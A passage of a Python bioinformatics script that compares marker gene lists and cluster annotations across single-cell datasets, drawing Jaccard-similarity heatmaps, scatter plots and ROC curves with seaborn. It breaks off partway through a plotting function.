def get_celltype_category(sample_types):
    """Convert raw cell-type labels into ordered 'index_label' categories.

    The candidate ordering depends on which labels are present (AC / NN /
    default); labels absent from the input are dropped from the ordering, and
    any label outside it becomes '<n>_NA' where n is the ordering length.
    """
    if 'AC' in sample_types:
        ordered = ['AC', 'EX', 'IN', 'MG', 'OG', 'OT']
    elif 'NN' in sample_types:
        ordered = ['NN', 'EX', 'IN']
    else:
        ordered = ['OT', 'EX', 'IN', 'MG', 'OG']
    ordered = [label for label in ordered if label in sample_types]
    na_tag = str(len(ordered)) + '_NA'
    return [str(ordered.index(s)) + '_' + s if s in ordered else na_tag
            for s in sample_types]
def plot_seaborn_barplot(df, x, y, hue, output, kwargs):
    """Draw a categorical bar plot (one facet column per *hue* value) and save it.

    kwargs is a dict of extra keyword arguments forwarded to sns.catplot.
    """
    ordered = df.sort_values(hue)
    print(ordered)
    print(x, y, hue)
    grid = sns.catplot(x=x, data=ordered, y=y, col=hue, kind='bar', **kwargs)
    grid.savefig(output, bbox_inches='tight')
    # Reset matplotlib state so later plots start from a clean figure.
    plt.close('all')
    plt.clf()
def plot_seaborn_scatter(data, x, y, hue, out, kwargs, annot=False, scatter=True, asc=True, sort=True):
    """Save three scatter (or line) plots of *data*: all rows, dataset-only rows,
    and marker-only rows, filtered against the global AMARKER label list.

    The output filename for each subset is derived from *out* by inserting the
    subset name before the first '.p' occurrence. kwargs is a dict forwarded to
    the seaborn plotting call; annot adds per-row index labels.
    """
    global AMARKER
    if sort:
        data = data.sort_values(hue, ascending=asc)
    print(kwargs)
    for mset in ['', 'data', 'marker']:
        # NOTE: str.replace('.p', ...) rewrites every '.p' in the path, not
        # just the extension — assumes '.p' only appears once in *out*.
        oname = out.replace('.p', mset+'.p')
        if mset == 'marker':
            # Marker sets only (first five AMARKER entries).
            df = data.loc[data[hue].isin(AMARKER[0:5]),:]
        elif mset == 'data':
            # Everything except the pure marker sets (keeps AMARKER[0]).
            df = data.loc[~data[hue].isin(AMARKER[1:5]),:]
        else:
            df = data
        if scatter:
            ax = sns.scatterplot(x=x, y=y, data=df, hue=hue, **kwargs)
        else:
            ax = sns.lineplot(x=x, y=y, data=df, hue=hue, **kwargs)
        # Legend outside the axes, two columns.
        ax.legend(bbox_to_anchor=(1.05, 1), loc=2, ncol=2, borderaxespad=0.)
        if annot:
            for line in range(0, df.shape[0]):
                ax.text(df.iloc[line,:][x], df.iloc[line,:][y], str(line), horizontalalignment='left', size='small', color='black')
        fig = ax.get_figure()
        fig.savefig(oname, bbox_inches='tight')
        plt.close()
        plt.clf()
def plot_specific_markers(path, out, x="Gad2", y="Slc17a7", hue="cluster"):
    """Scatter-plot per-cluster mean expression of two marker genes.

    path: pickled scanpy AnnData-like object (presumably; it must expose .X,
    .var.index and .obs). Silently returns when either gene is missing.
    """
    with open(path, "rb") as f:
        adata=pickle.load(f)
    print(adata.obs.columns)
    if x not in adata.var.index or y not in adata.var.index:
        return
    df = pd.DataFrame({x:adata[:,x].X, y:adata[:,y].X, hue:adata.obs.loc[:,hue]})
    print(df.iloc[0,:].loc[hue])
    # Purely numeric cluster ids get a zero-padded 'cluster_' prefix so they
    # sort lexicographically.
    if str(df.iloc[0,:].loc[hue]).replace(".", '').isdigit():
        max_digit = np.log10(max(df.loc[:,hue].values))
        df.loc[:,hue] = ['cluster_'+str(x).zfill(np.ceil(max_digit).astype(int)) for x in df.loc[:,hue]]
    print(df)
    # One point per cluster: mean expression of each gene.
    a = df.groupby(hue).mean()
    plot_seaborn_scatter(a.reset_index(), x, y, hue, out, {}, True)
def read_marker_gene(fname):
    """Return gene identifiers from a marker file.

    Skips '#' comment lines; for each remaining line, takes the first
    space-separated token and strips surrounding double quotes.
    """
    with open(fname) as handle:
        raw_lines = handle.readlines()
    genes = []
    for raw in raw_lines:
        if not raw or raw.startswith("#"):
            continue
        first_token = raw.rstrip('\n').split(' ')[0]
        genes.append(first_token.strip('"'))
    return genes
# def plot_specific_features(path, out, marker_file="", order=False, marker=False):
# with open(path, "rb") as f:
# adata=pickle.load(f)
# names = read_marker_gene(marker_file)
# rank, index = zip(*[[i, x] for i, x in enumerate(names) if x in adata.var.index])
# df = adata[:,list(index)].X
# if sparse.issparse(df):
# df = df.todense()
# df = pd.DataFrame(df)
# df.columns = adata[:,list(index)].var.index
# digit = np.ceil(np.log10(df.shape[1])).astype(int)
# gene_list = dict([(i, x) for i, x in enumerate(df.columns)])
# #df.columns = [str(i).zfill(digit) +"_"+x for i, x in enumerate(df.columns)]
# # if df.shape[1] > 50:
# df.columns = [i for i in range(len(df.columns))]
# mheader = os.path.basename(marker_file).split('.')[0]
# for cluster in ['celltype']:
# if cluster not in adata.obs.columns: continue
# print(cluster)
# df.loc[:,'cluster'] = adata.obs.loc[:,cluster].values
# mdf = df.loc[~pd.isnull(df.loc[:,'cluster']),:]
# mdf = mdf.loc[mdf.loc[:,'cluster'] != "Mis",:] # Remove nan and miscs
# mdf = mdf.loc[~mdf.loc[:,'cluster'].endswith('_NA'),:] # Remove nan and miscs
# mdf.loc[:,'cluster'] = ['0_OT' if x.split('_')[1] in ['AC', 'OG', 'MG', 'OT'] else x for x in mdf.loc[:,'cluster'].values]
# mdf = mdf.groupby('cluster').mean().reset_index()
# mdf = mdf.melt(id_vars=['cluster'])
# #mdf.loc[:,'cluster'] = [clusters.index(x) for x in mdf.loc[:,'cluster']]
# mdf.loc[:,'cluster'] = mdf.loc[:,'cluster'].astype('category')
# print(mdf)
# ax = sns.lineplot(x="variable", y="value", data=mdf, hue='cluster', palette='Set2', alpha=0.5)
# ax.legend(bbox_to_anchor=(1.05, 1), loc=2, ncol=2, borderaxespad=0.)
# fig = ax.get_figure()
# opath = os.path.join("contribut_"+out+"_"+mheader+"_"+cluster+'.png')
# fig.savefig(opath, bbox_inches='tight')
# plt.close()
# plt.clf()
# mdf = mdf[mdf.loc[:,'variable'] <= 40]
# max_index = mdf.loc[:,'variable'].max()
# mdf.loc[:,'variable'] = [gene_list[x] for x in mdf.loc[:,'variable']]
# print(mdf)
# print(mdf.loc[mdf.loc[:,'variable'].duplicated(),'variable'])
# mdf.loc[:,'variable'] = mdf.loc[:,'variable'].astype(pd.api.types.CategoricalDtype(categories = mdf.loc[~mdf.loc[:,'variable'].duplicated(), 'variable'].values))
# print(mdf)
# #.astype('category')
# if marker:
# ax = sns.lineplot(x="variable", y="value", data=mdf, hue='cluster', palette='Set2', alpha=0.5, marker='.')
# else:
# ax = sns.lineplot(x="variable", y="value", data=mdf, hue='cluster', palette='Set2', alpha=0.5)
# print(ax.get_xticklabels())
# #ax.set_xticklabels(ax.get_xticklabels(), rotation=30)
# for label in ax.get_xticklabels():
# label.set_rotation(90)
# ax.legend(bbox_to_anchor=(1.05, 1), loc=2, ncol=2, borderaxespad=0.)
# fig = ax.get_figure()
# opath = os.path.join("contribut_"+out+"_"+mheader+"_"+cluster+'_top.png')
# fig.savefig(opath, bbox_inches='tight')
# plt.close()
# plt.clf()
# def compare_rank_with_variance(head, input):
# df = pd.read_csv("/data/rkawaguc/data/190905_mouse_immune/1-s2.0-S0092867418316507-mmc3_var_ratio_lu.csv")
# idf = pd.read_csv(input, index_col=0)
# idf = idf.reset_index().melt(id_vars='index')
# m = idf.merge(df, left_on='value', right_on="GeneID", how='left')
# m = m.loc[~m.loc[:,'variable'].endswith('_NA'),:]
# m = m.loc[~pd.isnull(m.loc[:,'GeneID']),:]
# # print(m)
# # print(list(set(m.loc[:,'variable'].values)))
# for c in df.columns:
# if c == 'GeneID': continue
# print(c)
# plot_seaborn_scatter(m.loc[m.loc[:,'index'] < 1000, :], 'index', c, 'variable', head+'_'+c+'_1000', {'alpha':0.3, 'linewidth':0})
# p = m.loc[:,['index', 'variable', c]]
# #p = p.loc[~pd.isnull(p.loc[:,c]),:]
# print('???', p)
# p = p.groupby('variable').rolling(window=500, min_periods=250).mean()
# print('1st', p)
# p.columns = [x if x != 'index' else 'mindex' for x in p.columns]
# p = p.loc[:,[x for x in p.columns if x != 'variable']]
# print('before', p)
# p = p.reset_index()
# print('after', p)
# plot_seaborn_scatter(p, 'mindex', c, 'variable', head+'_'+c, {'alpha':0.8}, scatter=False)
# for u in m.loc[:,'variable'].unique():
# try:
# print(m.loc[m.loc[:,'variable'] == u, c].iloc[0:10,])
# print(c, u, wilcoxon(m.loc[m.loc[:,'variable'] == u, c], alternative=''))
# except:
# pass
def add_celltype_category(sample_types):
    """Normalize cell-type labels to ordered 'index_label' categories.

    Handles both plain labels ('EX') and already-numbered ones ('0_EX').
    With three or fewer real (non-NA) labels and no 'NN' present, everything
    except EX/IN is collapsed into 'NN'. Labels outside the chosen ordering
    become an '_NA' category.
    """
    has_number = len(sample_types[0].split('_')) >= 2
    print(has_number, sample_types)
    if has_number:
        base_labels = sorted(set(x.split('_')[1] for x in sample_types))
    else:
        base_labels = sorted(set(sample_types))
    non_na = [x for x in base_labels if x != 'NA']
    if len(non_na) <= 3 and 'NN' not in base_labels:
        # Collapse everything but EX/IN into the non-neuronal bucket.
        relabel = dict([(x, x) if x in ['IN', 'EX'] else (x, 'NN')
                        for x in base_labels])
        sample_types = [relabel[x] for x in sample_types]
    if 'AC' in base_labels:
        ordered = ['AC', 'EX', 'IN', 'MG', 'OG', 'OT']
    elif len(non_na) <= 3:
        ordered = ['NN', 'EX', 'IN']
    elif 'OT' in base_labels:
        ordered = ['OT', 'EX', 'IN', 'MG', 'OG']
    else:
        ordered = ['NN', 'EX', 'IN']
    if has_number:
        # Keep the caller's numbering; only rewrite unknown labels to NA.
        stripped = ['_'.join(x.split('_')[1:]) for x in sample_types]
        na_tag = str(len(base_labels) - 1) + '_NA'
        return [sample_types[i] if label in ordered else na_tag
                for i, label in enumerate(stripped)]
    return [str(ordered.index(x)) + '_' + x if x in ordered
            else str(len(ordered)) + '_NA' for x in sample_types]
def compare_rank_across_datasets(marker_list):
    """Merge per-dataset ranked-gene CSVs into one table per clustering tag.

    For each tag ('celltype' and 'icluster'), reads the fixed set of
    '<GSE>_..._rank_genes_<clust>.csv' files from the current directory,
    drops NA columns, prefixes each column with its dataset header, and
    writes the concatenation to 'rank_gene_list_<tag>.csv'.
    Note: *marker_list* is currently unused.
    """
    global ALL_DATA
    #dir_rank = 'rank_list'
    dir_rank = './'
    for tag in ['celltype', 'icluster']:
        clust = ('cluster' if tag == 'icluster' else tag)
        data = None
        headers = ["BICCN2_gene_"+clust, "GSE111586_gene_"+clust, \
                "GSE123576_gene_"+clust,\
                "GSE126074_gene_"+clust, "GSE127257_gene_"+clust]
        # GSE111586/GSE126074 use 'Ident' instead of 'cluster' in their
        # icluster filenames; otherwise the two branches differ only there.
        if tag == 'icluster':
            inputs = ["BICCN2_gene_id_order_gene__all_rank_genes_"+clust+".csv", \
                    "GSE111586_gene_id_order_gene__all_rank_genes_"+'Ident'+".csv", \
                    "GSE123576_gene_id_order_gene__all_rank_genes_"+clust+".csv", \
                    "GSE126074_gene_id_order_gene__all_rank_genes_"+'Ident'+".csv", \
                    "GSE127257_distal_id_gene_order__all_rank_genes_"+clust+".csv"]
        else:
            inputs = ["BICCN2_gene_id_order_gene__all_rank_genes_"+clust+".csv", \
                    "GSE111586_gene_id_order_gene__all_rank_genes_"+clust+".csv", \
                    "GSE123576_gene_id_order_gene__all_rank_genes_"+clust+".csv", \
                    "GSE126074_gene_id_order_gene__all_rank_genes_"+clust+".csv", \
                    "GSE127257_distal_id_gene_order__all_rank_genes_"+clust+".csv"]
        if ALL_DATA:
            headers.extend(["GSE1303990_gene_"+clust])
            inputs.extend(["GSE1303990_gene_id_order_gene__all_rank_genes_"+clust+'.csv'])
        if clust == 'cluster':
            # GSE100033 only provides cluster-level (not celltype) rankings.
            headers.extend(["GSE100033_gene_"+clust])
            inputs.extend(["GSE100033_gene_id_order_gene__all_rank_genes_"+clust+".csv"])
        for i, (head, input) in enumerate(zip(headers, inputs)):
            print(head, input)
            df = pd.read_csv(os.path.join(dir_rank, input), index_col=0)
            if clust == 'celltype':
                df.columns = add_celltype_category(df.columns)
                print(df.head())
            df = df.loc[:,[c for c in df.columns if '_NA' not in c]] # Remove Nan and miscs
            df.columns = [head+'_'+str(c) for c in df.columns]
            if data is None:
                data = df
            else:
                data = pd.concat([data, df], axis=1)
        print(data)
        data.to_csv('rank_gene_list_'+tag+'.csv')
def read_markers(fname):
    """Read a marker list as a pandas Series.

    Files whose name contains 'fc.txt' are parsed as space-separated tables
    (first column returned); all other files are read line-by-line with '#'
    comment lines skipped.
    """
    if 'fc.txt' in fname:
        table = pd.read_csv(fname, header=0, comment='#', sep=" ")
        print(table.head())
        return table.iloc[:, 0]
    with open(fname) as handle:
        raw_lines = handle.readlines()
    kept = [raw.rstrip('\n') for raw in raw_lines
            if raw and not raw.startswith('#')]
    return pd.Series(kept)
def test_raw_expression(scobj, raw_file):
    # TODO: not implemented — presumably intended to validate the scanpy
    # object's values against the raw expression file; confirm before use.
    pass
def compute_intersect(u, v):
    """Return the number of unique elements shared by *u* and *v*."""
    return len(set(u) & set(v))
def compute_jaccard(u, v):
    """Jaccard-style similarity of *u* and *v*.

    The intersection is over unique elements, but the denominator uses the
    raw list lengths (len(u)+len(v)-intersection), so duplicates inflate it.
    Returns 1.0 when the denominator equals the intersection (identical sets,
    or both inputs empty — which also avoids division by zero).
    """
    inter = len(set(u) & set(v))
    denom = len(u) + len(v) - inter
    if denom == inter:
        return 1.
    return inter / denom
def set_marker_color(sample_types, palette_name, ref=None, others='0_NN', max_s=None):
    """Map each label in *sample_types* to an RGB color from a seaborn palette.

    ref: optional explicit label ordering; defaults to first-appearance order
    of sample_types. Labels containing 'NA' get a fixed grey; labels missing
    from the mapping fall back to the color of *others*. max_s sets the
    palette size (must be >= number of unique labels).
    """
    print(sample_types)
    if ref is None:
        # Unique labels in first-appearance order.
        from collections import OrderedDict
        sample_uniq = OrderedDict((x, True) for x in sample_types).keys()
    else:
        sample_uniq = ref
        print(ref)
    if max_s is None:
        print(sample_uniq)
        max_s = len(sample_uniq)
    assert max_s >= len(sample_uniq)
    # Palette is reversed so the first label gets the last palette color;
    # 'NA' labels are pinned to a fixed grey instead.
    sample_dict = dict([(sam, col) if 'NA' not in sam else (sam, (0.3, 0.3, 0.35)) for sam, col in zip(sample_uniq, sns.color_palette(palette_name, max_s)[::-1])])
    print(sample_dict)
    return [sample_dict[c] if c in sample_dict else sample_dict[others] for c in sample_types]
def read_cluster_assignment(icluster=False, pad=False):
    """Read per-dataset cluster -> celltype annotation tables.

    Walks the curated annotation directory (files containing 'auto' are
    skipped) and builds a mapping '<GSE>_gene_cluster_<id>' -> celltype.

    icluster -- for GSE126074/GSE111586 (which ship both variants), use the
                'icluster' annotation files instead of the '_cluster' ones.
    pad      -- zero-pad numeric cluster ids to two digits in the key.
    Missing celltype cells map to the string 'NA'.

    Cleanup: renamed locals that shadowed the builtins `dict` and `dir`,
    and replaced `zfill(np.ceil(2).astype(int))` with the equivalent
    `zfill(2)`; behavior is unchanged.
    """
    anno_dir = "/data/rkawaguc/data/191003_BICCN_sf_marker_more/cluster_annotation/"
    assignment = {}
    for root, dirs, files in os.walk(anno_dir):
        for fname in files:
            if not fname.endswith('.csv') or 'auto' in fname:
                continue
            gse_number = fname.split('_')[0]
            if gse_number in ['GSE126074', 'GSE111586']:
                # These datasets have both cluster and icluster annotation
                # files; keep only the requested variant.
                if icluster and '_cluster' in fname: continue
                if (not icluster) and 'icluster' in fname: continue
            df = pd.read_csv(os.path.join(anno_dir, fname))
            for index, row in df.iterrows():
                value = row['celltype']
                if pd.isnull(value): value = 'NA'
                if (gse_number in ['GSE126074', 'GSE111586']) and icluster:
                    # icluster ids are kept verbatim (they may be non-numeric).
                    assignment[gse_number+'_gene_cluster_'+str(row['cluster'])] = value
                elif pad:
                    assignment[gse_number+'_gene_cluster_'+str(int(row['cluster'])).zfill(2)] = value
                else:
                    assignment[gse_number+'_gene_cluster_'+str(int(row['cluster']))] = value
    print('cluster_dict', assignment.keys())
    return assignment
def comp_jaccard_gene_list(rank_file_list, marker_file_list, header, annotated=True):
    """Compare ranked gene lists against marker gene sets via Jaccard similarity.

    rank_file_list   -- CSVs of ranked genes (concatenated column-wise).
    marker_file_list -- CSVs of marker gene sets (concatenated column-wise).
    header           -- output-file prefix; also encodes the clustering level.
    annotated        -- True when columns are already celltype-labelled;
                        otherwise a cluster->celltype map is loaded for coloring.
    """
    global AMARKER, SET
    print('comp_jaccard_gene_list')
    # Concatenate all ranked-gene tables column-wise.
    data = None
    for fname in rank_file_list:
        df = pd.read_csv(fname, index_col=0)
        if data is None: data = df
        else: data = pd.concat([data, df], axis=1)
    if annotated:
        dict = None
    else:
        # NOTE(review): local name shadows the builtin `dict`.
        dict = read_cluster_assignment(icluster=('icluster' in header))
    # Self-similarity clustering on the top-100 and top-1000 genes.
    plot_cluster(data.iloc[0:100,:], header, '_data_100', annotated=dict)
    plot_cluster(data.iloc[0:1000,:], header, '_data_1000', annotated=dict)
    # Concatenate all marker tables column-wise.
    marker = None
    for fname in marker_file_list:
        df = pd.read_csv(fname, index_col=0)
        if marker is None: marker = df
        else: marker = pd.concat([marker, df], axis=1)
    # Compare each marker group (column-name prefix) against the data,
    # keeping the dendrogram order/colors and score matrix for reuse below.
    col_dict = {}
    for m in ['SF', 'SC', 'CU', 'TA', 'TN', 'SM']:
        temp = marker.loc[:,marker.columns.str.contains(pat=m)]
        (col_ind, col_colors), score_mat = plot_cluster_against_marker(temp.iloc[0:100,:], data.iloc[0:100,:], header, '_'+m+'_100', annotated=dict)
        col_dict[m+'_100'] = [col_ind, col_colors, score_mat]
        (col_ind, col_colors), score_mat = plot_cluster_against_marker(temp.iloc[0:100,:], data.iloc[0:1000,:], header, '_'+m+'_1000', annotated=dict)
        col_dict[m+'_1000'] = [col_ind, col_colors, score_mat]
    # SM for the IN or EX clusters in each marker set
    if 'cluster' not in header:
        return
    sm_marker = marker.iloc[0:100,:].loc[:,marker.columns.str.contains(pat='SM')]
    for m in AMARKER[0:SET]:
        for gene_size in [100, 1000]:
            col_ind, col_colors, score_mat = col_dict[m+'_'+str(gene_size)]
            # Binary assignment: per data column, the unique best marker class.
            Y_pred_bin = get_max_indices(score_mat)
            # assumes score_mat rows 0/1 correspond to IN/EX -- TODO confirm.
            for i, c in enumerate(['IN', 'EX']):
                df = data.iloc[0:gene_size,:]
                y_pred = Y_pred_bin[i,:]
                selected_marker = [sc for sc in sm_marker.columns if c in sc]
                print(selected_marker, sm_marker)
                # Keep only the data columns predicted as class `c`, in dendrogram order.
                selected_order = [j for j in col_ind if y_pred[j] == 1]
                selected_color = [col_colors[h] for h, j in enumerate(col_ind) if y_pred[j] == 1]
                sm_pred = np.array([[compute_jaccard(sm_marker.loc[:,sc], df.iloc[:,j]) for j in selected_order] for sc in selected_marker])
                sm_pred = norm_row_columns(np.array(sm_pred))
                plot_cluster_against_marker_dist(selected_marker, df.iloc[:,selected_order].columns, sm_pred, header, '_'+m+'_'+str(gene_size)+'_sm_norm_'+c, dict, [selected_color])
def convert_sample_to_label(samples, annotated, problem=''):
    """Map sample/column names to ordered class labels.

    annotated -- optional name -> celltype dict; unmapped names become '3_NA'.
    problem   -- '' (3-class), a 'neuron' problem (neuron vs non-neuron), or
                 any other non-empty value for the IN-vs-EX reduction.
    """
    def base_label(name):
        if 'EX' in name:
            return '1_EX'
        if 'IN' in name:
            return '2_IN'
        if 'NA' in name:
            return '3_NA'
        return '0_NN'

    if annotated is not None:
        samples = [annotated[c] if c in annotated else '3_NA' for c in samples]
    labels = [base_label(c) for c in samples]
    if problem != '':
        if 'neuron' in problem:
            # Non-neuronal -> 0_N, neuronal (EX or IN) -> 1_P, rest -> 3_NA.
            labels = ['0_N' if 'NN' in c else
                      '1_P' if 'EX' in c or 'IN' in c else '3_NA'
                      for c in labels]
        else:
            # IN-vs-EX problem: everything else collapses to 3_NA.
            labels = ['1_EX' if 'EX' in c else
                      '2_IN' if 'IN' in c else '3_NA'
                      for c in labels]
    return labels
def plot_cluster(data, header, tail, annotated):
    """Heatmap of pairwise Jaccard similarity between the columns of *data*.

    Saves cluster_<header><tail>_clustered.pdf (dendrogram-ordered) and
    cluster_<header><tail>_original.pdf (input order). Row/column side colors
    encode the source dataset and the (optionally annotated) celltype label.

    BUGFIX: `np.nan_to_num(x, 1)` passed 1 as the positional *copy* flag, so
    NaN distances silently became the default 0 (identical lists). Undefined
    distances are now mapped to the maximum distance 1 as apparently intended.
    """
    global ALL_DATA
    viridis = cm.get_cmap('viridis', 15)
    # Pairwise Jaccard distance; the diagonal is forced to 0.
    dist = [[0 if j == c else 1.-compute_jaccard(data.loc[:,c], data.loc[:,j]) for j in data.columns] for c in data.columns]
    print(dist)
    dist = np.array(dist)
    dist[np.isnan(dist)] = 1  # undefined distance -> maximal distance
    pdist = ssd.squareform(dist)
    z = linkage(pdist)
    # First color row: source dataset (prefix before the first '_').
    sample_types = [c.split('_')[0] for c in data.columns]
    row_colors = [set_marker_color(sample_types, 'Greys', max_s=(6 if not ALL_DATA else 7))]
    # Second color row: celltype class labels.
    sample_types = convert_sample_to_label(data.columns, annotated)
    print(sample_types)
    if '3_NA' in sample_types:
        row_colors.append(set_marker_color(sample_types, 'Set2', ['3_NA', '0_NN', '1_EX', '2_IN']))
    else:
        row_colors.append(set_marker_color(sample_types, 'Set2', ['0_NN', '1_EX', '2_IN']))
    col_colors = row_colors
    # Replace the zero diagonal with the off-diagonal minimum so the
    # similarity heatmap (1 - dist) has its maximum on the diagonal.
    for i in range(len(dist)):
        dist[i][i] = 1
    for i in range(len(dist)):
        dist[i][i] = np.matrix(dist).min()
    dist = pd.DataFrame(1.-np.array(dist))
    dist.index = data.columns
    dist.columns = data.columns
    g = sns.clustermap(dist, cmap=viridis, row_colors=row_colors, col_colors=col_colors, linewidths=0.0, col_linkage=z, row_linkage=z)
    g.savefig("cluster_"+header+tail+"_clustered.pdf")
    g = sns.clustermap(dist, cmap=viridis, row_colors=row_colors, col_colors=col_colors, linewidths=0.0, col_cluster=False, row_cluster=False)
    g.savefig("cluster_"+header+tail+"_original.pdf")
def plot_cluster_against_marker(marker, data, header, tail, annotated, col_colors=None):
    """Plot marker-vs-data Jaccard similarity heatmaps (raw and normalized).

    Returns ((col_ind, col_colors), Y_pred) where col_ind is the dendrogram
    column order of the normalized plot and Y_pred is the raw (un-normalized)
    marker x data-column similarity matrix.

    Cleanup: the raw Jaccard matrix was previously computed twice (once for
    the plot, once for Y_pred); it is now computed once and reused —
    compute_jaccard is deterministic, so the values are identical.
    """
    import scipy.spatial.distance as ssd
    # Jaccard similarity of every marker column against every data column.
    scores = [[compute_jaccard(marker.loc[:,c], data.loc[:,j]) for j in data.columns] for c in marker.columns]
    print(data.columns, marker.columns)
    print(header, tail)
    _, _ = plot_cluster_against_marker_dist(marker.columns, data.columns, scores, header, tail, annotated, col_colors)
    Y_pred = np.array(scores)
    normed = norm_row_columns(np.array(scores))
    return plot_cluster_against_marker_dist(marker.columns, data.columns, normed, header+'_norm', tail, annotated, col_colors), Y_pred
def plot_cluster_against_marker_dist(marker_names, data_names, dist, header, tail, annotated, col_colors=None):
    """Draw clustered and unclustered heatmaps of a marker x data score matrix.

    dist       -- 2-D scores (rows = marker_names, cols = data_names).
    annotated  -- optional cluster -> celltype map used for column coloring.
    col_colors -- optional pre-computed column color rows; NOTE: this list is
                  appended to in place when supplied.
    Saves cluster_<header><tail>_clustered.pdf / _original.pdf.
    Returns (col_ind, colors): the dendrogram column order and the first
    color row reordered accordingly.
    """
    global ALL_DATA
    import scipy.spatial.distance as ssd
    from matplotlib import cm
    viridis = cm.get_cmap('viridis', 15)
    print(data_names, marker_names)
    # Column linkage is built on a clipped correlation distance between the
    # columns' score profiles (corr -> [0,1] -> 1 - corr, zero diagonal).
    tdist = pd.DataFrame(dist).corr()
    tdist = tdist.fillna(0)
    print(tdist)
    tdist = -1*np.clip(tdist, a_min=0, a_max=1)+1
    np.fill_diagonal(tdist.values, 0)
    pdist = ssd.squareform(tdist)
    z = linkage(pdist)
    # First column color row: source dataset (name prefix).
    sample_types = [c.split('_')[0] for c in data_names]
    if col_colors is None:
        col_colors = [set_marker_color(sample_types, 'Greys', max_s=(6 if not ALL_DATA else 7))]
    sample_types = convert_sample_to_label(data_names, annotated)
    #print(sample_types)
    if '3_NA' in sample_types:
        col_colors.append(set_marker_color(sample_types, 'Set2', ['3_NA', '0_NN', '1_EX', '2_IN']))
    else:
        col_colors.append(set_marker_color(sample_types, 'Set2', ['0_NN', '1_EX', '2_IN']))
    print(col_colors)
    # Row colors encode the celltype token (second '_' field) of each marker name.
    row_colors = set_marker_color([x.split('_')[1] for x in marker_names], 'Set2', ['NN', 'EX', 'IN'], others='NN')
    dist = pd.DataFrame(dist)
    dist.index = marker_names
    dist.columns = data_names
    g = sns.clustermap(dist, cmap=viridis, row_colors=row_colors, col_colors=col_colors, linewidths=0.0, col_linkage=z, row_cluster=False, xticklabels=True)
    col_ind = g.dendrogram_col.reordered_ind
    g.savefig("cluster_"+header+tail+"_clustered.pdf")
    g = sns.clustermap(dist, cmap=viridis, row_colors=row_colors, col_colors=col_colors, linewidths=0.0, col_cluster=False, row_cluster=False, xticklabels=True)
    g.savefig("cluster_"+header+tail+"_original.pdf")
    # NOTE(review): with exactly two color rows the first row is reordered
    # per column; otherwise col_colors itself is indexed by column position,
    # which yields color *rows*, not colors -- confirm the len != 2 branch
    # is intended.
    if len(col_colors) == 2:
        return col_ind, [col_colors[0][c] for c in col_ind]
    else:
        return col_ind, [col_colors[c] for c in col_ind]
def plot_aggregated_cluster_mean(mdirs, mfiles, files, cluster):
    """Aggregate per-cluster mean-signal CSVs across datasets and scatter-plot.

    mdirs/mfiles -- parallel lists of marker directories and per-directory
                    marker file lists.
    files        -- dataset file-name prefixes to aggregate.
    cluster      -- clustering level ('cluster', 'icluster', 'celltype', ...).
    """
    if cluster in ['cluster', 'icluster']:
        # NOTE(review): local name shadows the builtin `dict`.
        dict = read_cluster_assignment(pad=True)
    else:
        dict = None
    for i, (mdir, mflist) in enumerate(zip(mdirs, mfiles)):
        print(mdir, mflist)
        for j, mfile in enumerate(mflist):
            if j%3 != 2: continue  # only every third marker file (index 2 of each triple)
            for method in ['rankmean', 'average']:
                for reg_type in ['reg', 'reg_mean'][1:]:  # currently only 'reg_mean'
                    for mind in range(0, 3):
                        all = None  # NOTE(review): shadows the builtin `all`
                        for fhead in files:
                            # GSE126074/GSE111586 use 'Ident' as cluster column at icluster level.
                            if ('GSE126074' in fhead or 'GSE111586' in fhead) and cluster == 'icluster':
                                chead = 'Ident'
                            else:
                                chead = ('cluster' if cluster == 'icluster' else cluster)
                            csv_dir = fhead.split('_')[0]
                            if 'GSE' in csv_dir:
                                csv_dir = csv_dir[0:6]
                            fname = os.path.join("./figures/", fhead+method+'_'+mfile.split('.')[0]+'_'+chead+'_'+str(mind)+'_'+reg_type+'.csv')
                            print(fname)
                            if not os.path.exists(fname):
                                # Fall back to the per-dataset sub-directory.
                                fname = os.path.join("./figures/", csv_dir, fhead+method+'_'+mfile.split('.')[0]+'_'+chead+'_'+str(mind)+'_'+reg_type+'.csv')
                                print('second trial', fname)
                                if not os.path.exists(fname):
                                    continue
                            print(fname)
                            df = pd.read_csv(fname)
                            gse_number = fhead.split('_')[0]
                            df.loc[:,'batch'] = gse_number
                            if cluster in ['cluster', 'icluster']:
                                # NOTE(review): the comprehension's `i` shadows the outer loop index.
                                df.loc[:,'celltype'] = [dict[gse_number+'_gene_'+row['cluster']] for i,row in df.iterrows()]
                            all = pd.concat((all, df))
                            print(fhead, all.shape)
                        print('end')
                        print(all)
                        kwargs = ({'alpha':0.1, 'linewidth':0} if reg_type == 'reg' else {'alpha':0.8})
                        kwargs['style'] = 'batch'
                        out = 'agg_signal_'+mfile+'_'+method+'_'+reg_type+'_'+str(mind)+'_'+cluster+'.png'
                        # Drop rows whose celltype annotation ends with NA.
                        all = all.loc[~all.loc[:,'celltype'].str.endswith('NA'),:]
                        plot_seaborn_scatter(all, all.columns[2], all.columns[3], 'celltype', out=out, kwargs=kwargs)
def draw_auc_selected(file_list, header_list, output, palette=None, dir='./'):
    """Plot per-class (1_EX/2_IN/0_NN) ROC curves from pickled fp/tp files.

    NOTE(review): when *palette* is passed explicitly, `shape` is never
    bound and the plot_auc_result call below raises NameError; all call
    sites in this file appear to rely on palette=None.
    """
    global AMARKER
    if palette is None:
        palette, shape = get_palette_shape(len(AMARKER))
    # Colors are looked up by each header's position in the global AMARKER order.
    col_dict = dict([(h, palette[AMARKER.index(h)]) for i, h in enumerate(header_list)])
    for key in ['1_EX', '2_IN', '0_NN']:
        fptpr = {}
        # Reversed iteration controls curve draw/legend order.
        for header, fname in zip(header_list[::-1], file_list[::-1]):
            with open(os.path.join(dir, fname), 'rb') as f:
                df = pickle.load(f)
            if key in df:
                fptpr[header] = df[key]
        plot_auc_result(fptpr, output+'_'+key.split('_')[1]+'_auc.pdf', col_dict, shape[::-1])
def draw_auc_selected_each(file_list, header_list, output, palette=None, dir='./', marker=None, data=False):
    """Plot one combined ROC figure from per-header fp/tp pickle files.

    marker -- ordered marker-name list used for color lookup; defaults to AMARKER.
    NOTE(review): as in draw_auc_selected, `shape` is unbound when *palette*
    is supplied by the caller (NameError at the final call).
    """
    global AMARKER
    if marker is None:
        marker = AMARKER
    if palette is None:
        palette, shape = get_palette_shape(len(marker), data=data)
    # for i in range(len(header_list)):
    # print(header_list[i], file_list[i])
    print(marker, header_list)
    col_dict = dict([(h, palette[marker.index(h)]) for i, h in enumerate(header_list)])
    print(col_dict)
    fptpr = {}
    # Reversed iteration controls curve draw/legend order.
    for header, fname in zip(header_list[::-1], file_list[::-1]):
